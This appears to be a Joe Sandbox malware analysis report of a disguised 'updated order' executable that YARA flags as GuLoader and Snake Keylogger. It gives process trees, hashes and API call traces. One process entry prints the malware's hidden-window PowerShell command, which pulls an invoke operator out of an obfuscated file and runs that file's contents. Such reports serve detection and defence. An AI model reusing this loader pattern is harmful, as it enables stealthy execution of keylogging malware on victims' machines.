2024-10-08 01:32:52 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	21:31:55
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\rPedidoactualizado.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rPedidoactualizado.exe"
Imagebase:	0x400000
File size:	692'288 bytes
MD5 hash:	E3CA439A218A7EEB9432B91FBF185559
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:31:55
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"
Imagebase:	0x910000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2355081498.00000000096B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:31:55
Start date:	07/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:32:26
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\msiexec.exe"
Imagebase:	0x8d0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.4%
Total number of Nodes:	1340
Total number of Limit Nodes:	35

Executed Functions

Function 0040336C Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040338F
GetVersion.KERNEL32 ref: 00403395
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
OleInitialize.OLE32(00000000), ref: 0040340C
SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000020,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475

Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615

Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
ExitProcess.KERNEL32 ref: 00403701
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
CopyFileW.KERNEL32(C:\Users\user\Desktop\rPedidoactualizado.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
OpenProcessToken.ADVAPI32(00000000), ref: 00403827
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
ExitProcess.KERNEL32 ref: 004038A7

Strings

Error launching installer, xrefs: 00403697
~nsu, xrefs: 0040370C
C:\Users\user\Desktop\rPedidoactualizado.exe, xrefs: 004037BF
C:\Users\user\AppData\Local\Temp\, xrefs: 004035A4, 004035A9, 004035BF, 004035CB, 004035DA, 004035E7, 004035F3, 004035FB, 00403711, 00403722, 0040372D, 00403739, 00403746, 00403755, 00403806
"C:\Users\user\Desktop\rPedidoactualizado.exe", xrefs: 00403443, 00403449, 0040363D
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00403592, 004036B2, 0040375C, 00403766
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 004036BD
1033, xrefs: 00403610
\Temp, xrefs: 004035C6
SeShutdownPrivilege, xrefs: 00403836
TEMP, xrefs: 004035F4
Low, xrefs: 004035E2
.tmp, xrefs: 00403728
C:\Users\user\Desktop, xrefs: 00403733, 00403738, 00403765
NSIS Error, xrefs: 0040342E
TMP, xrefs: 004035FC
UXTHEME, xrefs: 004033BC, 004033C1, 004033C7

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\Desktop$C:\Users\user\Desktop\rPedidoactualizado.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-38364889
Opcode ID: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
Opcode Fuzzy Hash: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040549C
GetDlgItem.USER32(?,000003EE), ref: 004054AB
GetClientRect.USER32(?,?), ref: 004054E8
GetSystemMetrics.USER32(00000002), ref: 004054EF
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
ShowWindow.USER32(?,00000008), ref: 0040558B
GetDlgItem.USER32(?,000003EC), ref: 004055AC
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
GetDlgItem.USER32(?,000003F8), ref: 004054BA

Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251

GetDlgItem.USER32(?,000003EC), ref: 004055FE
CreateThread.KERNELBASE(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
CloseHandle.KERNELBASE(00000000), ref: 00405613
ShowWindow.USER32(00000000), ref: 00405637
ShowWindow.USER32(?,00000008), ref: 0040563C
ShowWindow.USER32(00000008), ref: 00405686
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
CreatePopupMenu.USER32 ref: 004056CB
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
GetWindowRect.USER32(?,?), ref: 004056FF
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
OpenClipboard.USER32(00000000), ref: 00405760
EmptyClipboard.USER32 ref: 00405766
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
GlobalLock.KERNEL32(00000000), ref: 0040577C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
GlobalUnlock.KERNEL32(00000000), ref: 004057B0
SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
CloseClipboard.USER32 ref: 004057C1

Strings

{, xrefs: 004056A4

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58

Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 004059D2
lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A1A
lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A3D
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A43
FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405A53
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
FindClose.KERNEL32(00000000), ref: 00405B02

Strings

(?z, xrefs: 00405A02
C:\Users\user\AppData\Local\Temp\, xrefs: 004059B7
"C:\Users\user\Desktop\rPedidoactualizado.exe", xrefs: 004059A9
\*.*, xrefs: 00405A14

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\rPedidoactualizado.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-4111169507
Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

Function 004065DA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,C:\Users\user\AppData\Local\Temp\nsx2132.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004065E5
FindClose.KERNELBASE(00000000), ref: 004065F1

Strings

pOz, xrefs: 004065DB
C:\Users\user\AppData\Local\Temp\nsx2132.tmp, xrefs: 004065DA

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsx2132.tmp$pOz
API String ID: 2295610775-1859215772
Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
Opcode Fuzzy Hash: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A

Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
ShowWindow.USER32(?), ref: 00403D8E
DestroyWindow.USER32 ref: 00403DA2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
GetDlgItem.USER32(?,?), ref: 00403DDF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
IsWindowEnabled.USER32(00000000), ref: 00403DFA
GetDlgItem.USER32(?,00000001), ref: 00403EA8
GetDlgItem.USER32(?,00000002), ref: 00403EB2
SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
GetDlgItem.USER32(?,00000003), ref: 00403FC3
ShowWindow.USER32(00000000,?), ref: 00403FE4
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
EnableWindow.USER32(?,?), ref: 00404011
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
EnableMenuItem.USER32(00000000), ref: 0040402E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
SetWindowTextW.USER32(?,007A1F20), ref: 00404097
ShowWindow.USER32(?,0000000A), ref: 004041CB

Memory Dump Source

Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

Function 00403987 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E

lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\rPedidoactualizado.exe",00000000), ref: 00403A08
